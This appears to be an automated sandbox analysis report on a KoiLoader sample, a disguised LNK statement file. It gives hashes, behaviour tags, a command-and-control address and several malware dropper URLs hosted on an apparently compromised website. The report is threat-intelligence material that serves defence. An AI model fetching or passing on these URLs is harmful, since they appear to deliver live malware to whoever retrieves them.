Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

01_11_2024_stmnt.lnk

windows11-21h2-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    01_11_2024_stmnt.pdf.zip

  • Size

    1KB

  • Sample

    241108-vbwj5avmax

  • MD5

    cb3314448a53fccca8e81f48ec172f2b

  • SHA1

    73aa6ad9fa94b2a82daffe6183870ae58612e448

  • SHA256

    f2a993d66e959f8358bcb7023095655856c9f9a172c20a1b92042077a05a7916

  • SHA512

    0677dbea73b51abafce9144e6d31052c778b29b395dccccc1f6f3ace7631948a9b8cc72901f16900ebf7813841af1abdbab0452f29d7d3545d87de93959f135f

Score
10/10
koiloaderdefense_evasiondiscoveryexecutionloader

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/stomachersjkl.php
exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/destineziteQaJxo.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php
exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php
exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php
exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1

Extracted

Family

koiloader

C2

http://82.118.19.30/stripper.php

Attributes
  • payload_url

    https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04

Targets

    • Target

      01_11_2024_stmnt.lnk

    • Size

      3KB

    • MD5

      d9b3bfc5bb4ae12f08c3ccd71b73bec2

    • SHA1

      ab60d0f7cbcb1df3b46b2df0dda5734ec922fd12

    • SHA256

      12d59541e4ce7bdfe5c346151de3fec00f2d096d662b9762d50a36097d41829e

    • SHA512

      38bea311ece6d92dcbd8c4a4e30c504ea1181e26fe6d9106365a71b7d069b78fa6bc2e0daa56fce45613d2ba2e878799893b6f632d3e54c8f73d3fbaf776d6f0

    Score
    10/10
    koiloaderdefense_evasiondiscoveryexecutionloader

    • KoiLoader

      KoiLoader is a malware loader written in C++.

      loaderkoiloader

    • Koiloader family

      koiloader

    • Detects KoiLoader payload

      loader

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

      execution

    • Indicator Removal: Clear Persistence

      Clear artifacts associated with previously established persistence like scheduletasks on a host.

      defense_evasion
    behavioral1

MITRE ATT&CK Enterprise v15

Tasks